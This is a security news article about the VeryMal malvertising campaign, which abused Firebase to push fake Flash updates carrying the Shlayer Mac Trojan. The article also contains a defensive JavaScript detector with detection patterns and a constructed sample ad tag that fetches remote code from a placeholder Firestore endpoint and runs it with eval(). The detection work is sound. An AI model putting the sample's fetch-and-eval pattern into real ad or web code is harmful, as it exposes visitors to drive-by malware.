Extensive Mac Malvertising Campaign Delivers Shlayer Trojan


A new, large-scale Mac malvertising campaign has just been discovered. Security researchers at Confiant say that approximately 1 million user sessions have potentially been exposed. The payload of the malvertising campaign is the Shlayer Trojan.

Who’s Behind the Mac Malvertising Campaign?

It’s believed that a group known as VeryMal is behind these Mac malvertising attacks. The group has been targeting Mac users, and it appears to have just switched to a new malicious scenario. Previously, the VeryMal criminals used steganography as an obfuscation technique. Now, the group is using ad tags that retrieve a payload from Google Firebase in order to redirect users to malicious pop-ups, Confiant said.

What is Firebase? Firebase is a mobile and web application development platform created by Firebase, Inc. in 2011 and acquired by Google in 2014. The platform is rich in features and offers a cloud-hosted backend suite that is typically used for mobile app development. One of the components abused by the attackers is Firestore, its document database, which has been leveraged inside the ad creative tags.

"The code in the tag actually does nothing more than request an entry from the attacker’s Firestore DB and then execute it as JavaScript using the eval() statement on line 27", the researchers noted.

After first checking whether it is running in a desktop Safari environment, the code has a sub-condition that checks whether “navigator.javaEnabled()” has been tampered with in the current environment. If everything checks out, the payload redirects the unsuspecting visitor to the Flash prompt. The notable aspect, however, is that to most people and to most defense mechanisms the tag looks like a normal, innocuous ad tag: the malicious logic lives in the Firestore entry, not in the tag itself.
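One defensive angle on the behaviour just described is to screen ad-tag JavaScript before it is served. The following is an added example, not code from the Confiant report or from the VeryMal tag: a small static heuristic that flags the combination of a Firebase/Firestore fetch, an eval() of the result, and the Safari/navigator.javaEnabled() fingerprinting checks. The two sample tags, the rule weights and the threshold are constructed for illustration.

```javascript
// Added example (not the researchers' or the attackers' code): a static screen
// for ad-tag source that combines a Firebase/Firestore fetch with eval() and
// the Safari / navigator.javaEnabled() gating described in the article.

// Each rule: an id for the finding, a pattern to match, and a weight.
const RULES = [
  { id: "firebase-endpoint", re: /firestore\.googleapis\.com|firebaseio\.com/i, weight: 2 },
  { id: "eval-call", re: /\beval\s*\(/, weight: 3 },
  { id: "safari-check", re: /\bSafari\b/, weight: 1 },
  { id: "javaEnabled-check", re: /navigator\.javaEnabled/, weight: 1 },
];

// Threshold (assumption): a remote Firebase fetch plus eval() alone is enough
// to flag the tag; the fingerprinting checks only raise the score further.
const SUSPICIOUS_THRESHOLD = 5;

// Returns the matched rule ids, the summed weight and a verdict.
function scanAdTag(source) {
  const matched = RULES.filter((r) => r.re.test(source));
  const hits = matched.map((r) => r.id);
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  return { hits, score, suspicious: score >= SUSPICIOUS_THRESHOLD };
}

// Constructed benign creative: a static image with a click-through link.
const BENIGN_TAG = `
  var a = document.createElement('a');
  a.href = 'https://example.com/landing';
  a.innerHTML = '<img src="https://cdn.example.com/banner.png">';
  document.currentScript.parentNode.appendChild(a);
`;

// Constructed tag mirroring the pattern the article describes; the project
// path is a placeholder, not a real endpoint.
const VERYMAL_STYLE_TAG = `
  if (/Safari/.test(navigator.userAgent) && navigator.javaEnabled) {
    fetch('https://firestore.googleapis.com/v1/PLACEHOLDER-PROJECT')
      .then(function (r) { return r.json(); })
      .then(function (d) { eval(d.fields.code.stringValue); });
  }
`;

console.log(scanAdTag(BENIGN_TAG));        // suspicious: false
console.log(scanAdTag(VERYMAL_STYLE_TAG)); // suspicious: true
```

Minified or string-obfuscated tags will evade plain regexes, so a real pipeline should run this on the deobfuscated source and treat it as one signal among several.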

Fortunately, Google has suspended the abused Firebase accounts, but the researchers believe that cybercriminals will continue to leverage this technique.

As for the display-ad redirects, they are being used to deliver fake Flash updates to unsuspecting users. Once the potential victim interacts with the ad on a website, a pop-up appears prompting the user to update their Flash player. If the user agrees to the prompt, the payload, the Shlayer Trojan, is deployed.

The Shlayer malware was first discovered in February 2018 by Intego researchers. The latest variant, however, was found by Carbon Black.
Shlayer macOS Malware Disables Gatekeeper and Downloads Adware.

More about the Shlayer Trojan

The Shlayer Trojan has been known for using fake Adobe Flash updates. A previous campaign used fake updates that masqueraded as legitimate sites, or hijacked domains that had previously hosted legitimate websites.

Malicious browser extensions have also been used by the Trojan. The dangerous code is disguised once again as an Adobe Flash Player installer.

Keep in mind that the Shlayer Mac Trojan can lead to further infections. Given its complex modular design, it can easily be used for other malicious purposes, such as the following:

Information Harvesting. The malware can be used to harvest data and can be configured to extract both machine metrics and user information. The first category is used to generate a unique ID assigned to each individual machine. This is done via an algorithm that uses a list of installed hardware components, user settings and other operating system metrics. It can also directly expose the identity of the victims by looking for strings that may reveal their name, address, phone number, location and any stored account credentials.

System Changes. To facilitate further infections, the payload code can make various changes to the compromised machines: configuration files, operating system environment values and user settings.

Boot Options Changes. By accessing the macOS system settings, the Shlayer Trojan can set itself or the other deployed payloads to start automatically when the computer is powered on.

Additional Payload Delivery. The Trojan can be used to deliver other threats to the computers, such as miners and ransomware.

If you suspect that you’ve been compromised by a Mac malvertising campaign that dropped the Shlayer Trojan on your Mac, you can refer to the instructions provided below to clean your system.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ’Mr. Robot’ and fears ’1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!
